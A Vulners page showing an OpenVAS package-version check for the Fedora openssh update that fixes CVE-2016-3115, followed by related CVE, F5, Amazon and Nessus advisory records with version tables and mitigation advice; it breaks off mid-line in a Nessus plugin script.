Search...

Fedora Update for openssh FEDORA-2016-0

2016-04-11T00:00:00

ID OPENVAS:1361412562310807752
Type openvas
Reporter Copyright (C) 2016 Greenbone Networks GmbH
Modified 2019-03-15T00:00:00

Description

The remote host is missing an update for the

                                        
                                            ###############################################################################
# OpenVAS Vulnerability Test
#
# Fedora Update for openssh FEDORA-2016-0
#
# Authors:
# System Generated Check
#
# Copyright:
# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.807752");
  script_version("$Revision: 14223 $");
  script_tag(name:"last_modification", value:"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $");
  script_tag(name:"creation_date", value:"2016-04-11 14:52:19 +0200 (Mon, 11 Apr 2016)");
  script_cve_id("CVE-2016-3115");
  script_tag(name:"cvss_base", value:"5.5");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:S/C:P/I:P/A:N");
  script_tag(name:"qod_type", value:"package");
  script_name("Fedora Update for openssh FEDORA-2016-0");
  script_tag(name:"summary", value:"The remote host is missing an update for the 'openssh'
  package(s) announced via the referenced advisory.");
  script_tag(name:"vuldetect", value:"Checks if a vulnerable version is present on the target host.");
  script_tag(name:"affected", value:"openssh on Fedora 24");
  script_tag(name:"solution", value:"Please install the updated package(s).");
  script_xref(name:"FEDORA", value:"2016-0");
  script_xref(name:"URL", value:"https://lists.fedoraproject.org/pipermail/package-announce/2016-March/179924.html");
  script_tag(name:"solution_type", value:"VendorFix");
  script_category(ACT_GATHER_INFO);
  script_copyright("Copyright (C) 2016 Greenbone Networks GmbH");
  script_family("Fedora Local Security Checks");
  script_dependencies("gather-package-list.nasl");
  script_mandatory_keys("ssh/login/fedora", "ssh/login/rpms", re:"ssh/login/release=FC24");

  exit(0);
}

include("revisions-lib.inc");
include("pkg-lib-rpm.inc");

release = rpm_get_ssh_release();
if(!release)
  exit(0);

res = "";

if(release == "FC24")
{

  if ((res = isrpmvuln(pkg:"openssh", rpm:"openssh~7.2p2~1.fc24", rls:"FC24")) != NULL)
  {
    security_message(data:res);
    exit(0);
  }

  if (__pkg_match) exit(99);
  exit(0);
}

JSON Vulners Source

Initial Source

{"id": "OPENVAS:1361412562310807752", "type": "openvas", "bulletinFamily": "scanner", "title": "Fedora Update for openssh FEDORA-2016-0", "description": "The remote host is missing an update for the ", "published": "2016-04-11T00:00:00", "modified": "2019-03-15T00:00:00", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807752", "reporter": "Copyright (C) 2016 Greenbone Networks GmbH", "references": ["2016-0", "https://lists.fedoraproject.org/pipermail/package-announce/2016-March/179924.html"], "cvelist": ["CVE-2016-3115"], "lastseen": "2019-05-29T18:35:18", "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2016-3115"]}, {"type": "f5", "idList": ["F5:K93532943", "SOL93532943"]}, {"type": "amazon", "idList": ["ALAS-2016-668"]}, {"type": "nessus", "idList": ["ALA_ALAS-2016-668.NASL", "FEDORA_2016-0BCAB055A7.NASL", "FEDORA_2016-08E5803496.NASL", "F5_BIGIP_SOL93532943.NASL", "FEDORA_2016-FC1CC33E05.NASL", "SLACKWARE_SSA_2016-070-01.NASL", "FEDORA_2016-BB59DB3C86.NASL", "ORACLEVM_OVMSA-2016-0048.NASL", "FEDORA_2016-D339D610C1.NASL", "FREEBSD_PKG_E4644DF8E7DA11E5829DC80AA9043978.NASL"]}, {"type": "threatpost", "idList": ["THREATPOST:F895E4C708DB124636408645530A739D"]}, {"type": "seebug", "idList": ["SSV:91041"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:136234", "PACKETSTORM:140019"]}, {"type": "freebsd", "idList": ["E4644DF8-E7DA-11E5-829D-C80AA9043978"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310120658", "OPENVAS:1361412562310131265", "OPENVAS:1361412562311220161008", "OPENVAS:1361412562310871580", "OPENVAS:1361412562310882431", "OPENVAS:1361412562310882432", "OPENVAS:1361412562310807983", "OPENVAS:1361412562310105581", "OPENVAS:1361412562310871579", "OPENVAS:1361412562310807942"]}, {"type": "fedora", "idList": ["FEDORA:34AAC6006272", "FEDORA:6D06760BBCF5", "FEDORA:ECCBA601614F", "FEDORA:407BB60A2C79", "FEDORA:6A9C96049DE4", "FEDORA:8B394604A712"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:1902C998CBF9154396911926B4C3B330", "EXPLOITPACK:F92411A645D85F05BDBD274FD222226F", "EXPLOITPACK:9F2E746846C3C623A27A441281EAD138"]}, {"type": "exploitdb", "idList": ["EDB-ID:40858", "EDB-ID:39569"]}, {"type": "archlinux", "idList": ["ASA-201603-12"]}, {"type": "slackware", "idList": ["SSA-2016-070-01"]}, {"type": "oraclelinux", "idList": ["ELSA-2016-0741", "ELSA-2016-0466", "ELSA-2016-0465", "ELSA-2016-3531"]}, {"type": "redhat", "idList": ["RHSA-2016:0465", "RHSA-2016:0466"]}, {"type": "symantec", "idList": ["SMNTC-1361"]}, {"type": "centos", "idList": ["CESA-2016:0465", "CESA-2016:0466"]}, {"type": "aix", "idList": ["OPENSSH_ADVISORY8.ASC"]}, {"type": "ubuntu", "idList": ["USN-2966-1"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:782597A83B98B15285C8A73B8555B7B2"]}, {"type": "gentoo", "idList": ["GLSA-201612-18"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1500-1:E6BD7"]}], "modified": "2019-05-29T18:35:18", "rev": 2}, "score": {"value": 6.4, "vector": "NONE", "modified": "2019-05-29T18:35:18", "rev": 2}, "vulnersScore": 6.4}, "pluginID": "1361412562310807752", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for openssh FEDORA-2016-0\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807752\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-04-11 14:52:19 +0200 (Mon, 11 Apr 2016)\");\n script_cve_id(\"CVE-2016-3115\");\n script_tag(name:\"cvss_base\", value:\"5.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for openssh FEDORA-2016-0\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'openssh'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"openssh on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-0\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2016-March/179924.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"openssh\", rpm:\"openssh~7.2p2~1.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "naslFamily": "Fedora Local Security Checks"}

{"cve": [{"lastseen": "2021-02-02T06:28:05", "description": "Multiple CRLF injection vulnerabilities in session.c in sshd in OpenSSH before 7.2p2 allow remote authenticated users to bypass intended shell-command restrictions via crafted X11 forwarding data, related to the (1) do_authenticated1 and (2) session_x11_req functions.\n<a href=\"https://cwe.mitre.org/data/definitions/93.html\">CWE-93: Improper Neutralization of CRLF Sequences ('CRLF Injection')</a>", "edition": 6, "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.4, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 2.7}, "published": "2016-03-22T10:59:00", "title": "CVE-2016-3115", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3115"], "modified": "2018-09-11T10:29:00", "cpe": ["cpe:/o:oracle:vm_server:3.2", "cpe:/a:openbsd:openssh:7.2"], "id": "CVE-2016-3115", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3115", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}, "cpe23": ["cpe:2.3:o:oracle:vm_server:3.2:*:*:*:*:*:*:*", "cpe:2.3:a:openbsd:openssh:7.2:p1:*:*:*:*:*:*"]}], "f5": [{"lastseen": "2020-04-06T22:40:25", "bulletinFamily": "software", "cvelist": ["CVE-2016-3115"], "description": "\nF5 Product Development has assigned ID 583678 (BIG-IP), ID 584222 (Enterprise Manager), ID 584220 (BIG-IQ), INSTALLER-2306 (Traffix SDC), and LRS-60665 (LineRate) to this vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H589591 on the **Diagnostics** > **Identified** > **Medium** page. \n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.3 \n11.2.1 \n10.2.1 - 10.2.4 | 14.0.0 \n13.0.0 \n12.1.3 | Medium | OpenSSH * \nBIG-IP AAM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.3 | 14.0.0 \n13.0.0 \n12.1.3 | Medium | OpenSSH * \nBIG-IP AFM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.3 | 14.0.0 \n13.0.0 \n12.1.3 | Medium | OpenSSH * \nBIG-IP Analytics | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.3 | 14.0.0 \n13.0.0 \n12.1.3 | Medium | OpenSSH * \nBIG-IP APM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.3 \n11.2.1 \n10.2.1 - 10.2.4 | 14.0.0 \n13.0.0 \n12.1.3 | Medium | OpenSSH * \nBIG-IP ASM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.3 \n11.2.1 \n10.2.1 - 10.2.4 | 14.0.0 \n13.0.0 \n12.1.3 | Medium | OpenSSH * \nBIG-IP DNS | 12.0.0 - 12.1.2 | 14.0.0 \n13.0.0 \n12.1.3 | Medium | OpenSSH * \nBIG-IP Edge Gateway | 11.2.1 \n10.2.1 - 10.2.4 | None | Medium | OpenSSH * \nBIG-IP GTM | 11.4.0 - 11.6.3 \n11.2.1 \n10.2.1 - 10.2.4 | None | Medium | OpenSSH * \nBIG-IP Link Controller | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.3 \n11.2.1 \n10.2.1 - 10.2.4 | 14.0.0 \n13.0.0 \n12.1.3 | Medium | OpenSSH * \nBIG-IP PEM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.3 | 14.0.0 \n13.0.0 \n12.1.3 | Medium | OpenSSH * \nBIG-IP PSM | 11.4.0 - 11.4.1 \n11.2.1 \n10.2.1 - 10.2.4 | None | Medium | OpenSSH * \nBIG-IP WebAccelerator | 11.2.1 \n10.2.1 - 10.2.4 | None | Medium | OpenSSH * \nBIG-IP WOM | 11.2.1 \n10.2.1 - 10.2.4 | None | Medium | OpenSSH * \nARX | None | 6.0.0 - 6.4.0 | Not vulnerable | None \nEnterprise Manager | 3.0.0 - 3.1.1 | None | Medium | OpenSSH * \nFirePass | None | 7.0.0 \n6.0.0 - 6.1.0 | Not vulnerable | None \nBIG-IQ Cloud | 4.0.0 - 4.5.0 | None | Medium | OpenSSH * \nBIG-IQ Device | 4.2.0 - 4.5.0 | None | Medium | OpenSSH * \nBIG-IQ Security | 4.0.0 - 4.5.0 | None | Medium | OpenSSH * \nBIG-IQ ADC | 4.5.0 | None | Medium | OpenSSH * \nBIG-IQ Centralized Management | 4.6.0 | None | Medium | OpenSSH * \nBIG-IQ Cloud and Orchestration | 1.0.0 | None | Medium | OpenSSH * \nLineRate | 2.5.0 - 2.6.1 | None | Low | OpenSSH \nF5 WebSafe | None | 1.0.0 | Not vulnerable | None \nTraffix SDC | 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1 | None | Low | OpenSSH \n \n* The affected versions ship with vulnerable code, but do not enable the code by default. The X11Forwarding option is not enabled unless explicitly enabled by an administrator.\n\nIf you are running a version listed in the **Versions known to be vulnerable **column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable **column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo determine the necessary upgrade path for your BIG-IQ system, you should understand the BIG-IQ product offering name changes. For more information, refer to [K21232150: Considerations for upgrading BIG-IQ or F5 iWorkflow systems](<https://support.f5.com/csp/article/K21232150>).\n\nMitigation\n\nTo mitigate this vulnerability, you can ensure that the X11Forwarding option is absent, commented out, or set to \"no\" in the **sshd_config** configuration file. Additionally, you may restrict remote access to the **sshd** TCP port 22 to trusted networks only.\n\n**Impact of action:** Performing the suggested mitigations should not have a negative impact on your system.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n", "edition": 1, "modified": "2018-10-18T21:55:00", "published": "2016-04-27T21:18:00", "id": "F5:K93532943", "href": "https://support.f5.com/csp/article/K93532943", "title": "SSHD session.c vulnerability CVE-2016-3115", "type": "f5", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2016-04-27T21:01:54", "bulletinFamily": "software", "cvelist": ["CVE-2016-3115"], "edition": 1, "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the **Severity** values published in the previous table. The **Severity** values and other security vulnerability parameters are defined in SOL4602: Overview of the F5 security vulnerability response policy.\n\nTo mitigate this vulnerability, you can ensure that the X11Forwarding option is absent, commented out, or set to \"no\" in the **sshd_config** configuration file. Additionally you may restrict remote access to the **sshd** TCP port 22 to trusted networks only.\n\n**Impact of action:** Performing the suggested mitigations should not have a negative impact on your system.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL13123: Managing BIG-IP product hotfixes (11.x - 12.x)\n * SOL10025: Managing BIG-IP product hotfixes (10.x)\n * SOL9502: BIG-IP hotfix matrix\n * SOL15106: Managing BIG-IQ product hotfixes\n * SOL15113: BIG-IQ hotfix matrix\n", "modified": "2016-04-27T00:00:00", "published": "2016-04-27T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/k/93/sol93532943.html", "id": "SOL93532943", "title": "SOL93532943 - SSHD session.c vulnerability CVE-2016-3115", "type": "f5", "cvss": {"score": 5.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:NONE/"}}], "amazon": [{"lastseen": "2020-11-10T12:37:32", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3115"], "description": "**Issue Overview:**\n\nIt was discovered that the OpenSSH server did not sanitize data received in requests to enable X11 forwarding. An authenticated client with restricted SSH access could possibly use this flaw to bypass intended restrictions.\n\n \n**Affected Packages:** \n\n\nopenssh\n\n \n**Issue Correction:** \nRun _yum update openssh_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n openssh-server-6.6.1p1-23.60.amzn1.i686 \n openssh-keycat-6.6.1p1-23.60.amzn1.i686 \n openssh-debuginfo-6.6.1p1-23.60.amzn1.i686 \n openssh-6.6.1p1-23.60.amzn1.i686 \n pam_ssh_agent_auth-0.9.3-9.23.60.amzn1.i686 \n openssh-ldap-6.6.1p1-23.60.amzn1.i686 \n openssh-clients-6.6.1p1-23.60.amzn1.i686 \n \n src: \n openssh-6.6.1p1-23.60.amzn1.src \n \n x86_64: \n openssh-keycat-6.6.1p1-23.60.amzn1.x86_64 \n pam_ssh_agent_auth-0.9.3-9.23.60.amzn1.x86_64 \n openssh-clients-6.6.1p1-23.60.amzn1.x86_64 \n openssh-ldap-6.6.1p1-23.60.amzn1.x86_64 \n openssh-6.6.1p1-23.60.amzn1.x86_64 \n openssh-server-6.6.1p1-23.60.amzn1.x86_64 \n openssh-debuginfo-6.6.1p1-23.60.amzn1.x86_64 \n \n \n", "edition": 3, "modified": "2016-03-16T16:30:00", "published": "2016-03-16T16:30:00", "id": "ALAS-2016-668", "href": "https://alas.aws.amazon.com/ALAS-2016-668.html", "title": "Medium: openssh", "type": "amazon", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}], "nessus": [{"lastseen": "2021-01-12T10:14:50", "description": "This update provides recent upstrem fix published with openssh-7.2p2\n(#1316529).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 18, "cvss3": {"score": 6.4, "vector": "AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"}, "published": "2016-04-01T00:00:00", "title": "Fedora 22 : openssh-6.9p1-11.fc22 (2016-d339d610c1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3115"], "modified": "2016-04-01T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:openssh", "cpe:/o:fedoraproject:fedora:22"], "id": "FEDORA_2016-D339D610C1.NASL", "href": "https://www.tenable.com/plugins/nessus/90285", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2016-d339d610c1.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90285);\n script_version(\"2.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-3115\");\n script_xref(name:\"FEDORA\", value:\"2016-d339d610c1\");\n\n script_name(english:\"Fedora 22 : openssh-6.9p1-11.fc22 (2016-d339d610c1)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update provides recent upstrem fix published with openssh-7.2p2\n(#1316529).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1316829\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2016-March/180491.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9163a8a7\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openssh package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/04/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"openssh-6.9p1-11.fc22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh\");\n}\n", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2021-01-12T10:15:04", "description": "Sync with openssh package.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 18, "cvss3": {"score": 6.4, "vector": "AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"}, "published": "2016-04-27T00:00:00", "title": "Fedora 22 : gsi-openssh-6.9p1-8.fc22 (2016-fc1cc33e05)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3115"], "modified": "2016-04-27T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:gsi-openssh", "cpe:/o:fedoraproject:fedora:22"], "id": "FEDORA_2016-FC1CC33E05.NASL", "href": "https://www.tenable.com/plugins/nessus/90740", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2016-fc1cc33e05.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90740);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-3115\");\n script_xref(name:\"FEDORA\", value:\"2016-fc1cc33e05\");\n\n script_name(english:\"Fedora 22 : gsi-openssh-6.9p1-8.fc22 (2016-fc1cc33e05)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Sync with openssh package.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1318201\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2016-April/183101.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?354d4b7a\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected gsi-openssh package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:gsi-openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/04/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/04/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif 